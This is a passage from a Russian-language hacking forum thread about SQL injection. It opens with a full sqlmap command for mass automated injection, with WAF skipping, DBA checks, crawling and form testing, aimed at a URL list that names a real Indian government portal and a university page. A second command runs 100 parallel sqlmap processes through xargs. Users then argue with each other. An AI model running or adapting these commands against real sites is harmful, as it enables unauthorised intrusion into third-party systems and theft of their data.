sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --timeout=1 --skip-static --technique=UET --threads=3 --retries=1 --crawl=2 --form -m url2.txt

Код:

https://rtionline.gov.in/request/status.php
https://www.valdosta.edu/academics/graduate-school/application-status-check.php

Это конечно не самые быстрые варианты, хз как сделать что бы он быстрее работал. Я пока не придумал

Вариант с xargs будет по быстрее (типа многопоточтость)
< url2.txt xargs --max-procs=100 -I{} sh -c sqlmap --random-agent --risk=1 --skip-waf --hex --is-dba --batch --time-sec=1 --timeout=1 --skip-static --technique=UET --threads=3 --retries=1 --crawl=2 --form -m {}
(не проверял, нет под рукой уникс машины)

Eject · 03.03.2019

D@rkS1de сказал(а):

берешь ставишь и юзаешь , а не ждешь что-то кто-то за тебя сделает и напишет то нажми там напиши

У меня есть работа и более интересные и профитные вещи.
Я крайне скиптически отношусь к этому решению, чтобы тратить на это время.

D@rkS1de · 03.03.2019

Eject сказал(а):

У меня есть работа и более интересные и профитные вещи.
Я крайне скиптически отношусь к этому решению, чтобы тратить на это время.

так зачем ты тратишь тогда свое время чтоб отписывать в этом топике? если тебе безразличны sqli

D@rkS1de · 03.03.2019

BabaDook сказал(а):

Оно не очень работает. Это просто обвязка из инструментов, можно узнать как работает каждый из, что и как делает, что берёт на вход. Вообщем я немного глянул, ничего сложного, ничего интересного

та я его вообще не юзаю, херня

Eject · 03.03.2019

D@rkS1de сказал(а):

так зачем ты тратишь тогда свое время чтоб отписывать в этом топике? если тебе безразличны sqli

Не писал что мне "безразличны sqli" ты же мне сам писал про AutoSqli, как ты не понял контекста???
(сдаётся мне кто-то просто флудер)

D@rkS1de · 03.03.2019

Eject сказал(а):

Не писал что мне "безразличны sqli" ты же мне сам писал про AutoSqli, как ты не понял контекста???
(сдаётся мне кто-то просто флудер)

сдаётся мне кто-то просто тупой.

SQLi и с чем его едят (2019)

(L1) cache

(L1) cache

(L1) cache

(L1) cache

Скидди

(L1) cache

HDD-drive

HDD-drive

(L1) cache

floppy-диск

(L1) cache

(L1) cache

RAM

(L1) cache

(L3) cache

(L1) cache

RAM

RAM

(L1) cache

RAM